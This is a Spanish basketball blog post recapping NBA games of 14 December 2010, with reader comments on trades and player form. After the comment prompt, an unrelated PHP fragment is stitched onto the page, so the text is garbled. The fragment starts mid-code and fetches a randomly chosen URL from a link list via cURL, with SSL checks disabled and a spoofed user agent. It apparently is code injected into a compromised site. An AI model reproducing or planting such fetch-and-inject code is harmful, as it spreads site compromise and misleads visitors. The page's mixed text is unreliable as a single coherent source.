La Crónica (14/12/2010)

15 de December de 2010 por TheDeerHunter

Debutó Andrew Bynum este curso en Washington. Apenas jugó un cuarto de hora pero se le vio bastante bien. Su sola presencia ayudó al equipo, duismuyendo el esfuerzo de Pau a 30 minutos y desplazándole por momentos a la posición de PF donde se siente muy cómodo. Los Wizards, con las bajas de Wall y Blatche, resistieron tan sólo un cuarto recibiendo 70 puntos entre el segundo y el tercero cuando Kobe, Odom y Shannon pudieron anotar como les vino en gana (103-89).  Se rumorea que Vujacic saldrá del equipo próximamente en un traspaso a tres bandas que le llevaría a los Nets y acabaría con Terrence Williams en los Rockets y Joe Smith en los Lakers para reforzar el maltrecho juego interior. Lamentando la salida por la puerta de atrás de The Machine sería un gran traspaso para los campeones. Los Nets, por cierto, tan sólo fueron capaces de meterle 77 a los Sixers y eso que Iguodala estuvo horrible (82-77). Les vendrá muy bien Vujacic si encuentra la manera de volver a parecer un jugador de baloncesto. La parte positiva es que la Kardashian y la Sharapova tendrán la posibilidad de hacerse (¿más?) amigas.

En el Este dos gallos perdieron. Atlanta se dejó sorprender, 80-103, por unos Pistons en estado de gracia donde sobresalieron (oh noticia!!) Hamilton, Villanueva y, sobre todo, Tracy McGrady en su mejor actuación desde su calvario personal. Con Jamal Crawford anotando sólo 2 puntos los halcones ni dan miedo. Los Magic se llevaron un palizón tremendo de manos de Melo y sus Nuggets a pesar del partidazo de J.J Redick (94-111). Nelson y Rashard Lewis se lucieron con un 3 de 19 entre ambos. Para cortarse las venas.

Por su parte, los Bobcats disfrutaron de la plácida defensa de los Raptors para rozar los 100 puntos y eso que no contaban con Stephen Jackson (91-97). Mohammed y Kwane Brown anotaron 18 y 10 dejando muy en evidencia la actuación de Bargnani, ya de por sí bastante lamentable en ataque.

Finalmente los Rockets van paso a paso recuperando posiciones y anoche lograron su 10ª victoria (105-118) ante los Kings, donde no jugó Tyreke. 7 hombres lograron dobles figuras con Scola y Budinger destacados. En la bahía de Oakland la parejita Monta Ellis&Reggie Williams se la armaron a los Wolves (99-108) y eso que Darko Milicic se marcó un partido, esta vez sí, de número 1 de aquel draft.

PREMIOS

MVP: Carmelo Anthony y Monta Ellis fueron los mejores en el día de ayer. Ambos lideraron a los suyos a la victoria, el primero con 35 puntos y 11 rebote sy el segundo con 34 puntos, 4 rebotes y 6 asistencias.

Rookie: Demarcus Cousins siempre ha declarado que demostrará que los Nets se equivocaron escogiendo a Derrick Favors en su lugar. Anoche el de Sacramento consiguió 17 puntos y 7 rebotes pero el de los Nets contestó con 10 puntos y 13 rebotes (5 ofensivos). Aquí hay calidad.

Sorpresa: ¡Victoria de los Pistons y gran partido de Charlie Villanueva! ¡Todo el mismo día! El dominicano jugó uno de sus mejores partidos de la temporada anotando 23 puntos (10 de 17), capturando 11 rebotes y robando 3 balones. Otro que parece que se entona es Spencer Hawes: 18 puntos, 5 rebotes y 4 asistencias en 24 minutos.

Decepción: Normalmente me centraría en el 1 de 11 de Kris Humphries, pero no puedo dejar de nombrar a Rashard Lewis. 2 de 9 en tiro, 2 rebotes, 1 asistencia, 8 puntos… A mi estos números me transmiten apatía y es algo que se va repetiendo demasiadas veces este año.

Esfuerzo en vano: Parece que poco a poco JJ Redick va cogiendo la forma y alcanzando el nivel que mostró en los pasados Playoffs. Anoche fue el mejor de los Magic, en la derrota frente Denver, con 29 puntos (9 de 12) y 5 rebotes.

Comenta

20 comentarios a esta entrada

  1. LEmontus dice:
    #1

    Me encata Lowry es muy buen base y está ahciendo jugar a Houston.

    Favors me parece que será siempre un jugador secuandio en la liga un jugador con un físico potente en la universidad pero con un físico medio en la NBA. Por el contrario Cousins es el rookie más prometedor de esta camada al menos para mi gusto tiene mucha calidad y muchos recursos parar anotar.

      Citar

  2. MagicJohnson32 dice:
    #2

    No fueron malas las sensaciones con Bynum. Va a necesitar tiempo, lógicamente, para recuperar su mejor forma, pero para empezar va a permitir que todo el juego interior no pase por mantener a Pau +40 minutos en pista. No espero mucho de Joe Smith, pero algunos minutitos de calidad también podría ofrecer.

    A Sasha se le agradecen los servicios prestados, que siempre haya sido un tío implicado, que le ha puesto ganas en todo momento y, sobre todo, dos tiros libres que valen una carrera.

      Citar

  3. Denise dice:
    #3

    No coincido contigo, Deer, un gran traspaso para Lakers hacerse con los servicios de Joe Smith?? pero si este Pterodactyl no puede ni con las botas, para que lo quieren los Lakers? y menos ahora con Bynum y con la proxima vuelta de Ratliff. Además, si el propio Ratliff jugaba menos que Mbenga al principio, cuando sólo estaban en la pintura, Pau, Odom, Character y él.
    Soy partidario de traspasar a Vujacic, pero traspasarlo por algo bueno, que mejore el equipo, porque para dejarlo igual, me quedo con el expiring de 5 kilos de Vujacic.
    No me canso de repetir, que temporadon de Brown y Odom, lo mejorcito de los Lakers ahora mismo.
    Lo de Lewis no tiene remedio, Orlando necesita un trade urgentemente y deshacerse de este vago, pero me temo que nos vamos a comer su contrato. El equipo está mal, el banquillo no aporta soluciones, y anoche, nuevo ridiculo vs unos Nuggets sin Billups, Martin y Andersen. Melo anotó lo que le dio la gana, y partidazo de dos jugadores que me encantan, Afflalo y Lawson.

      Citar

  4. Albertis dice:
    #4

    Está claro que cuando este Shannon Brown está enchufado el plus que le da al equipo es tremendo, (contra Chicago no fue su día y como se notó), está demostrando que a parte de los muelles tiene una muñeca privilegiada, su 45% en triples es tremendo! Entre este y Barnes el cambio con respecto a la pasada temporada de banquillo es claro, (incluyendo a Odom en este grupo)
    Aún así, este año cae otro anillo en Massachusetts!!!

      Citar

  5. Ru dice:
    #5

    A ver quién es el listo que se come los 66 millones de Lewis en 3 años,el 2º jugador que más cobra de la NBA,sólo por detrás de KB.Para tirarse de los pelos…y lo que queda,y ya el año pasado daba visos de esto.No creo que vaya a mejorar por arte de magia.

    Lo del traspaso,desde una perspectiva Laker muy interesante.No sé lo que jugará en la RS -supongo que el rookie conservará esos pocos minutos en la rotación- pero en PO hace falta gente veterana y Joe Smith te puede aportar 4 o 5 minutitos muy interesantes.

    Esta noche partidazo,a ver qué medida da NYK frente a los verdes

      Citar

  6. nacho dice:
    #6

    Hombre, Brown y Odom lo mejorcito ahora mismo… si es hoy o ayer, bueno, pero Kobe está, casi siempre, y Pau le doy un primer mes de juego bestial al equipo.
    En cuanto a banquillos, parece que LA prometía mucho, pero, no sé, no sé, me pareció más versatil el de SA el otro día, contra los amentables Blazers. Supongo que el tío Phil lo ve bien, porque mira hacia abril, pero dudas dejan. Será porque les he visto en casi todas sus derrotas, y en pocas victorias. Lo de Shasa no termino de verlo, para esto que lo hubieran hecho en verano, que algo mejor cazaban, y más joven.

      Citar

  7. Rompe dice:
    #7

    Los hombres altos de los Lakers, por mucho que vayan sanando ahora, no son de fiar casi ninguno. Bynum casi siempre se pierde media temporada, Ratlif tiene la edad que tiene (al igual que Smith) y Gasol se suele perder algunos partidos durante la temporada, y más como tenga mucha carga de juego. Así que no me parece que sobren este tipo de hombres… Cuantos más tengas, más posibilidades hay de que pilles alguno sano de vez en cuando jeje.

      Citar

  8. Busky23 dice:
    #8

    Fichajes intrascendentes,jugadores que pululan por la liga esperando a que alguien los repesque por el motivo que sea y que si aparte de ganar un buen puñado de dólares les ponen un anillito en el dedo,pues mejor que mejor. Que venga o no venga Joe Smith,que se quede o se marche Vujacic,no afecta para nada,aquí todos sabemos quienes se van a jugar las habichuelas.
    Menuda vidorra la del esloveno,muchas temporadas en un equipo campeón,viviendo en los Ángeles y en la cama la Kournikova,eso es un mvp de la vida.

      Citar

  9. Busky23 dice:
    #9

    Próximos sueldos NBA Rashard Lewis
    Temporada 2011/2012 > 22.152.000 $
    Temporada 2012/2013 > 23.790.000 $
    Ñam,ñam

      Citar

  10. Rompe dice:
    #10

    Olé por Lewis! Desde luego, con jugadores como T-Mac te puede salir mal la jugada, pero en el momento de firmar el contrato está claro que el jugador vale esos millones. Pero en el caso de Rashard?? Alguna vez fue un top 5 NBA?? A Orlando se le fue la mano cosa bárbara, que diría Enjuto xD

      Citar

  11. CAMPO2 dice:
    #11

    No por favor, otra vez un backcourt farmar vujacic, vuelven las pesadillas de cada noche

      Citar

  12. nacho dice:
    #12

    Pues estos con minutos la pueden liar, eso sí uno de cada diez partidos. Ahora el día que les entren…, ya veo las crónicas, y yo sacando pecho, pues no he ‘rentao’ los tiros libres del esloveno. El aviso queda, si este año cae la suerte de que hagan entre los dos un buen partido, aquí me tendréis.

      Citar

  13. Denise dice:
    #13

    Con lo de que Brown y Odom son lo mejorcito de los Lakers ahora mismo, me refiero a que están dando un rendimiento muy por encima de su nivel habitual o de lo que podiamos esperar de ellos. Me refiero a eso, todos sabemos que Pau o Kobe a un 80% son mejores o más de fiar en momentos calientes que Odom o Brown al 130%

      Citar

  14. KB # 24 dice:
    #14

    100% de acuerdo con Denise, y hasta podríamos decir que un Bryant o Gasol al 100% es mejor que Brown y Odom los dos al 200%

      Citar

  15. kantonyo dice:
    #15

    Lemontus, en mi opinión, a Favors le costó bastante dominar la zona en la Universidad, e incluso pienso que no domino casi nunca, y menos en el March Madness. Llegó con bastante fama del High School, pero fue una de la decepciones del año pasado, a pesar de elllo acabó en los primeros puesto del draft. De todas formas pienso igual que tu, tengo bastante dudas sobre su potencial, aunque hay que darle margen, es jovencisimo. Sólo por las ganas que le pone, me quedo con Cousins de largo.

      Citar

  16. LEmontus dice:
    #16

    La verdad que lo de Favors lo dije sin saber era una suposición no lo he seguido antes del draft pero por caer tan alto supuse que sería el típico caso de jugador que destaca por su físico pero cuando da el salto deja de ser supeiror físicamente y se estanca. Pues si ni siquiera abusaba en las ligas inferiores peor todavia jajaj… de todas maneras ya digo que esta es de las peores camadas que recuerdo con wall favors turner …..

      Citar

  17. Denise dice:
    #17

    Los Spurs no tienen mal banco, pero para mí, inferior al de Lakers. George Hill si es mejor que Blake, pero el resto….Brown y Barnes se comen con los ojos cerrados a Neal y a Anderson; y en la pintura, confio más en Bynum-Ratliff que en un Splitter-Matt Bonner-McDyess. Lo que no entiendo es por qué Splitter sigue jugando tan poco en este equipo.

      Citar

  18. Viva_Dirk dice:
    #18

    Los números de Favors no estan nada mal, en 19 minutos de juego son 6.7 puntos y 5.6 rebotes con porcentajes del 54%, y lo da todo en la pista, hasta el momento ha demostrado ser un gran reboteador, que es lo poco que le deja demostrar Avery Johnson.

      Citar

  19. TheDeerHunter dice:
    #19

    Avery Johnson dimisión!!!!

      Citar

  20. Txusma dice:
    #20

    Por hacer una comparativa, Kevin Garnett en su primer año en la NBA (tenía 19) promedió 10 puntos y 6 rebotes por partido en 28 minutos por partido. Cuando los jugadores llegan tan jóvenes, hay q esperar 2 ó 3 años para acabar de decidirse sobre su auténtico nivel.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>